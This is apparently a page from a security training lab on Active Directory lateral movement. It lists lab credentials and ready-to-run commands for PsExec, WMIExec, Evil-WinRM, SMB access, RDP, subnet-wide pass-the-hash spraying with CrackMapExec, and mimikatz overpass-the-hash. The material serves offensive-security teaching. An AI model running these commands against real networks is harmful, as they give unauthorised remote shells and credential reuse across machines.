⚠️ Pracivo Security Lab — Advanced AD attack techniques beyond Kerberoasting. Includes AS-REP Roasting, DCSync, Golden Tickets, and BloodHound.
Lab Credentials: ram / pracivo | john.smith / Welcome1 | administrator / Admin@2024
Lateral Movement Techniques
POST-EXPLOITATION
# Once you have credentials or a hash, move to other machines
# 1. PsExec — creates a service on remote host
psexec.py corp.local/administrator:Admin@2024@192.168.1.20
# Or with hash:
psexec.py -hashes :NTLM_HASH corp.local/administrator@192.168.1.20
# 2. WMI — stealthier, no service creation
wmiexec.py corp.local/administrator:Admin@2024@192.168.1.20
# 3. WinRM / Evil-WinRM
evil-winrm -i 192.168.1.20 -u administrator -p Admin@2024
# Or pass the hash:
evil-winrm -i 192.168.1.20 -u administrator -H NTLM_HASH
# 4. SMB — access shares and read files
smbclient //192.168.1.20/c$ -U administrator
crackmapexec smb 192.168.1.0/24 -u administrator -p Admin@2024
# 5. RDP — graphical session
xfreerdp /v:192.168.1.20 /u:administrator /p:Admin@2024
# 6. Pass the Hash with CrackMapExec — spray hash across subnet
crackmapexec smb 192.168.1.0/24 -u administrator -H NTLM_HASH --local-auth
# 7. Overpass the Hash — convert NTLM hash to Kerberos TGT
mimikatz: sekurlsa::pth /user:administrator /domain:corp.local /ntlm:HASH /run:cmd.exe
# Scanning for targets:
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt